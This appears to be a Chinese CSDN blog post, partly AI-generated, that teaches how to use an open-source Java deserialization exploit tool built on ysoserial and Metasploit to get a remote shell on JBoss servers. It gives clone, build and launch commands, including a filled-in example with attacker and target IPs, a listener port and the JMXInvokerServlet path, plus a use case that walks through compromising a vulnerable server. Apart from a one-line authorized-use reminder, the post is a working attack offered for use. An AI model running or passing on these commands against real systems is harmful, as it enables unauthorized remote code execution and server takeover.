Java Deserialization Exploit 项目教程

最新推荐文章于 2024-10-10 08:19:41 发布
最新推荐文章于 2024-10-10 08:19:41 发布
阅读量663 收藏 19
点赞数 12
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_00831/article/details/142804310

Java Deserialization Exploit 项目教程

Java-Deserialization-Exploit Java-Deserialization-Exploit 项目地址: https://gitcode.com/gh_mirrors/ja/Java-Deserialization-Exploit

1、项目介绍

Java Deserialization Exploit 是一个基于 Chris Frohoff 的 ysoserial 工具开发的工具,旨在利用 Java 反序列化漏洞在易受攻击的 Linux 机器上获取远程 shell。该项目通过结合 Metasploit Framework 工具生成恶意二进制文件,并使用嵌入式 Web 服务器将 payload 传输到受害者端。目前,该项目仅支持在 Linux 架构上的 JBoss 平台进行利用。

项目地址: https://github.com/njfox/Java-Deserialization-Exploit

2、项目快速启动

2.1 环境准备

  • 安装 Java 运行环境 (JRE)
  • 安装 Maven
  • 安装 Metasploit Framework
  • 安装 msfvenom

2.2 克隆项目

git clone https://github.com/njfox/Java-Deserialization-Exploit.git
cd Java-Deserialization-Exploit

2.3 编译项目

mvn clean compile assembly:single

2.4 运行项目

java -jar target/JBossExploit-0.5.2-alpha-jar-with-dependencies.jar -lhost <攻击机IP> -lport <监听端口> -payload <payload类型> -rhost <目标IP> -rport <目标端口> -srvport <本地HTTP服务器端口> -uripath <目标资源URI>

示例:

java -jar target/JBossExploit-0.5.2-alpha-jar-with-dependencies.jar -lhost 192.168.1.100 -lport 4444 -payload CommonsCollections1 -rhost 192.168.1.200 -rport 8080 -srvport 8000 -uripath /invoker/JMXInvokerServlet

3、应用案例和最佳实践

3.1 应用案例

假设你发现一个运行在 JBoss 上的 Web 应用存在 Java 反序列化漏洞,你可以使用该工具生成一个恶意 payload,并通过反序列化漏洞在目标服务器上执行该 payload,从而获取远程 shell。

3.2 最佳实践

  • 安全测试: 仅在授权的环境中使用该工具进行安全测试。
  • 更新依赖: 定期更新项目依赖,确保使用最新的安全补丁。
  • 日志记录: 在测试过程中记录所有操作,以便后续分析和报告。

4、典型生态项目

  • ysoserial: 该项目的基础工具,用于生成各种反序列化 payload。
  • Metasploit Framework: 用于生成和监听恶意 payload。
  • JBoss: 该项目主要针对的漏洞平台。

通过以上步骤,你可以快速上手并使用 Java Deserialization Exploit 项目进行安全测试和漏洞利用。请务必在合法和授权的环境中使用该工具。

Java-Deserialization-Exploit Java-Deserialization-Exploit 项目地址: https://gitcode.com/gh_mirrors/ja/Java-Deserialization-Exploit

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

Java rmi-codebase记录
AsagiRiAsagi的博客
03-16 862
不得不承认能学会这么多利用姿势全靠站在巨人的肩膀上8u191后的JNDI注入利用:这篇文章介绍的RMI攻击方法在低版本比较适用搞懂RMI、JRMP、JNDI-终结篇:三梦师傅的文章,更侧重代码调试和RMI的原理,写文章的思路也是针对JNDI利用,按照不同的jdk版本介绍相应的攻击手法。Java RMI远程利用分析:长亭师傅写的文章,主要在死磕rmi服务这块给了不少思路,缺点是代码和命令贴的不是很全一次攻击内网rmi服务的深思bsmali4师傅写的,关于如何绕JEP290写的相当详细。
【Academy】反序列化漏洞Insecure deserialization
D-river博客
08-01 1378
序列化是将复杂的数据结构(如对象及其字段)转换为可以作为顺序字节流发送和接收的“更丝滑”格式的过程。将复杂数据写入进程间内存、文件或数据库例如,通过网络、在应用程序的不同组件之间或在API调用中发送复杂数据至关重要的是,当序列化一个对象时,它的状态也会被持久化。换句话说,对象的属性及其指定的值都会被保留。不安全的反序列化是指用户可控的数据被网站认证。这可能使攻击者能够操纵序列化对象,以便将有害数据传递到应用程序代码中。甚至可以用完全不同类的对象替换序列化对象。
探索Java反序列化漏洞的利器:Java Deserialization Exploit工具推荐
gitblog_00041的博客
06-20 451
探索Java反序列化漏洞的利器:Java Deserialization Exploit工具推荐 Java-Deserialization-Exploit 项目地址: https://gitcode.com/gh_mirrors/ja/Java-Deserial...
Java Deserialization Exploit 项目使用教程
gitblog_00899的博客
10-10 873
Java Deserialization Exploit 项目使用教程 Java-Deserialization-Exploit 项目地址: https://gitcode.com/gh_mirrors/ja/Java-Dese...
Java反序列化漏洞利用工具:JBossExploit
gitblog_00167的博客
10-10 1034
Java反序列化漏洞利用工具:JBossExploit 项目地址:https://gitcode.com/gh_mirrors/ja/Java-Deserialization-Exploit 项目介绍 Java Deserialization Exploit 是一个基于Chris Frohoff的ysoserial工具开发的漏洞利用工具,专门针对Linux系统上的JBoss平台进行远程代码执行。该...
探索Java反序列化漏洞利用:Java Deserialization Exploits
gitblog_00033的博客
05-19 365
探索Java反序列化漏洞利用:Java Deserialization Exploits 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 在网络安全领域,Java反序列化漏洞常常被利用为攻击手段,引发远程代码执行(RCE)等严重后果。Java Deserialization Exploits 是一个精心整理的开源项目,它集合了针对多个知名软件的Java反序列化漏洞利...
Java deserialization RCE in Tomcat cluster
热门推荐
Exploit的小站~
05-10 1万+
最近楼主也没有其他的时间来做漏洞研究了,读者们可以从本博上次更新的时间就可以看出来=_,=。 但是为了一直关注本楼主的朋友们,我决定拿出两年前的一个存货(其实是辣鸡洞)分享,诚意满满(大雾)。 以下是正文: —————————————————————————————————————————————————————— TL;DR: 本文主要介绍Tomcat集群的实现机制以及如何发现了反序列化...
ysomap:一个基于ysererial的有用的Java反序列化利用框架
05-14
Ysomap is A helpful Java Deserialization exploit framework based on ysoserial #1 起因 在实际分析ysoserial的利用链时,有时候会觉得框架写的太死,有以下几个缺点: 同一个利用链如果想改变一下最后的利用效果...
JNDI-Inject-Exploit
11-04
# JNDI-Inject-Exploit ## 免责声明 本工具仅面向**合法授权的企业安全测试**,如您需测试本工具的可用性请自行搭建靶机环境,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的...
java8看不到源码-exploitpack:漏洞利用包-项目
06-04
这些代码可能包括PwnKit、Heartbleed、Shellshock等知名漏洞的Java实现,或者是针对Java特定组件的利用代码,如Java deserialization漏洞。分析这些代码可以帮助我们了解漏洞的本质,学习如何修复它们,同时也能提高...
智慧农业数字乡村数字化场景DeepSeek+AI大模型智算一体机设计方案.pptx
06-23
智慧农业数字乡村数字化场景DeepSeek+AI大模型智算一体机设计方案.pptx
【Bernstein-2025研报】美国服装及专业零售:美国运动服装需求追踪(2025年5月).pdf
06-23
【Bernstein-2025研报】美国服装及专业零售:美国运动服装需求追踪(2025年5月).pdf
《UPBGE:Blender最佳集成游戏引擎的持续更新》
06-23
资源下载链接为: https://pan.quark.cn/s/ab6ed9424307 UPBGE(Uchronia项目Blender Game Engine)是Blender的一个分支版本,由Blender Game Engine的开发人员Porteries Tristan及其一些朋友于2015年9月创建。它是一个独立的分支,旨在对现有的Blender Game Engine(BGE)代码进行清理和优化,尝试引入新功能,并实现那些目前存在但尚未与Blender官方主线合并的被遗忘的功能。在Blender Foundation决定从2.8版本开始移除BGE之后,UPBGE实际上成为了唯一继续进行Game Engine开发的项目。这使得UPBGE在开发过程中拥有更大的自由度,因为它不会与Blender的正式版本产生冲突。UPBGE的开发周期为4个月,其中3个月用于添加新功能和重构代码,1个月用于修复错误,之后会发布一个新版本,每年大约有3到4个版本可供下载。
课程设计-jsp2120车间信息管理系统ssh-qkr.zip
06-23
课程设计 源代码数据库配套报告教程
《2012年HGT21581自控系统安装工程图册》
最新发布
06-23
资源下载链接为: https://pan.quark.cn/s/27aaeeaf622d 《HGT 21581-2012 自控安装图册》是一本用于指导自动化控制系统安装的图册。它详细展示了自动化设备在安装过程中的布局、布线、连接以及调试等环节的具体要求和操作方法。图册通过清晰的图纸和详细的标注,为安装人员提供了直观的参考,帮助他们准确地完成自动化控制系统的安装任务。
课程设计-jsp1973图书管理系统oracle-qlkrp.zip
06-23
课程设计 源代码数据库配套文档教程
ctf java反序列化
02-10
这些工具能够帮助参赛选手快速构建针对特定环境下的exploit代码片段,例如通过调用系统命令接口达到控制目标机器的目的。 #### 实际案例分析 以WebLogic为例,该平台曾暴露出名为"wls-async" 的严重缺陷(CNVD-C-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成婕秀Timothy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值